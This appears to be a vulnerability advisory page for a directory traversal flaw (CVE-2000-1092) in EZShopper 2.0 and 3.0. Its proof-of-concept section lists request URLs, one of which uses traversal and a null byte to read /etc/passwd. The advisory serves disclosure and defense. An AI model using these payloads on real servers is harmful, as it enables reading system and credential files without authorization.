Alex Heiphetz Group EZShopper Directory Traversal Vulnerability
BID:2109
Info
Alex Heiphetz Group EZShopper Directory Traversal Vulnerability
| Bugtraq ID: | 2109 |
| Class: | Input Validation Error |
| CVE: |
CVE-2000-1092 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 13 2000 12:00AM |
| Updated: | Jul 11 2009 04:46AM |
| Credit: | Discovered and posted to Bugtraq on Dec 13, 2000 by Nsfocus Security Team <[email protected]>. |
| Vulnerable: |
Alex Heiphetz Group EZShopper 3.0 Alex Heiphetz Group EZShopper 2.0 |
| Not Vulnerable: | |
Exploit / POC
Alex Heiphetz Group EZShopper Directory Traversal Vulnerability
Nsfocus Security Team <[email protected]> has provided the following examples:
EZshopper v3.0:
http://www.example.com/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/
EZshopper v2.0:
http://www.example.com/cgi-bin/ezshopper2/loadpage.cgi?id+/
Zero X <[email protected]> provided the following example:
http://www.example.com/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html
Nsfocus Security Team <[email protected]> has provided the following examples:
EZshopper v3.0:
http://www.example.com/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/
EZshopper v2.0:
http://www.example.com/cgi-bin/ezshopper2/loadpage.cgi?id+/
Zero X <[email protected]> provided the following example:
http://www.example.com/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html
References
Alex Heiphetz Group EZShopper Directory Traversal Vulnerability
References:
References:
- EZShopper Homepage (Alex Heiphetz Group, Inc.)
- EZshopper is still vulnerable against Directory Traversal. (Zero_X www.lobnan.de Team